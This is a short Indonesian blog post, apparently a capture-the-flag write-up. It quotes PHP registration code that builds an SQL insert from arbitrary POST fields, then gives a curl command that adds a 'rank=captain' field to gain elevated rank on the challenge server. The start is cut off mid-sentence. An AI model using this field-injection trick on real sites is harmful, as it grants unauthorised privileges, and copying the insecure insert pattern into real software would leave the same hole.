terdapat celah pada
jadi saya harus mengirim data post dengan menggunakan CURL, caranya dengan buka terminal lalu membuat perintah seperti ini:foreach($_POST as $key => $value){$columns .= filter($key) . ",";$values .= "'" . filter($value) . "',";}$columns = substr($columns, 0, -1);$values = substr($values, 0, -1);$stmt = $conn->prepare("insert into users ($columns) values ($values)");
curl -d "username=bukanhakel&password=pinginjadihakel&rank=captain" -X POST "http://gamactf.asgama.web.id:41002/register_proc.php"setelah berhasil mendaftar silahkan login pakai username dan password sudah didaftarkan, maka flag akan muncul
No comments:
Post a Comment